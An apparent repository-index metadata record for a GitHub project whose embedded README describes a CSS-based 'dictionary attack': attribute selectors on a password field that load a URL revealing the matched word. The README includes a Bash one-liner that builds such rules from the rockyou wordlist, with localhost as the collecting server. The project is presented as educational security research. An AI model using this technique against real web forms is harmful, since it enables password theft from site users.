{"id":15374457,"url":"https://github.com/ivan-sincek/css-dictionary-attack","last_synced_at":"2025-08-03T05:30:52.446Z","repository":{"id":107018885,"uuid":"170513891","full_name":"ivan-sincek/css-dictionary-attack","owner":"ivan-sincek","description":"Example on how to steal information with CSS from web forms.","archived":false,"fork":false,"pushed_at":"2021-08-06T08:55:50.000Z","size":105,"stargazers_count":2,"open_issues_count":0,"forks_count":3,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-10-17T16:21:25.768Z","etag":null,"topics":["css","defensive-security","dictionary","ethical-hacking","offensive-security","security","web","web-penetration-testing"],"latest_commit_sha":null,"homepage":"","language":"CSS","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-02-13T13:36:44.000Z","updated_at":"2024-08-12T19:45:47.000Z","dependencies_parsed_at":null,"dependency_job_id":"32df416b-5b07-4587-92a6-9fc7e6f352a4","html_url":"https://github.com/ivan-sincek/css-dictionary-attack","commit_stats":{"total_commits":1,"total_committers":1,"mean_commits":1.0,"dds":0.0,"last_synced_commit":"0331753c3253d9b255932d9e6a4d0dc3d0b244b4"},"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fcss-dictionary-attack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fcss-dictionary-attack/tags","releases_url":"https://rep
os.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fcss-dictionary-attack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fcss-dictionary-attack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/css-dictionary-attack/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":228526750,"owners_count":17933291,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["css","defensive-security","dictionary","ethical-hacking","offensive-security","security","web","web-penetration-testing"],"created_at":"2024-10-01T13:58:49.985Z","updated_at":"2024-12-06T21:21:18.356Z","avatar_url":"https://github.com/ivan-sincek.png","language":"CSS","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CSS Dictionary \"Attack\"\n\nExample of how to steal information with CSS from web forms due to poor code quality or other vulnerabilities.\n\nThe attack is only possible under very specific conditions. First, the server must echo the targeted parameter's value back to the web form; second, you need to find a way to link your own CSS file or to modify an existing one.\n\nEven then it is hard to carry out this type of attack due to the large dictionary file size and high RAM consumption.\n\nTested on XAMPP for Windows v7.4.3 (64-bit) with Chrome v80.0.3987.149 (64-bit) and Firefox v74.0 (64-bit).\n\nMade for educational purposes. 
I hope it will help!\n\n## How to Run\n\nImport [\\db\\css_dictionary.sql](https://github.com/ivan-sincek/css-dictionary-attack/blob/master/db/css_dictionary.sql) to your database server.\n\nCopy all the content from [\\src\\](https://github.com/ivan-sincek/css-dictionary-attack/tree/master/src) to your server's web root directory (e.g. to \\xampp\\htdocs\\ on XAMPP).\n\nChange the database settings inside [\\src\\api\\php\\config.ini](https://github.com/ivan-sincek/css-dictionary-attack/blob/master/src/api/php/config.ini) as necessary.\n\nNavigate to the website with your preferred web browser.\n\n---\n\nTo transform an existing dictionary into a CSS dictionary, run the following Bash command (modify it to your needs):\n\n```bash\nfor word in $(cat rockyou_1000.txt); do echo \"input[name=pwd][value=\\\"${word}\\\"]{background-image:url(http://localhost/api/css.php?v=${word})}\"; done \u003e rockyou_1000.css\n```\n\n**Check an already existing dictionary [here](https://github.com/ivan-sincek/css-dictionary-attack/blob/master/dict) and the CSS dictionary [here](https://github.com/ivan-sincek/css-dictionary-attack/blob/master/src/css/rockyou_1000.css).**\n\n## Images\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/css-dictionary-attack/blob/master/img/dictionary.jpg\" alt=\"CSS Dictionary\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 1 - CSS Dictionary\u003c/p\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fcss-dictionary-attack","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Fcss-dictionary-attack","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fcss-dictionary-attack/lists"}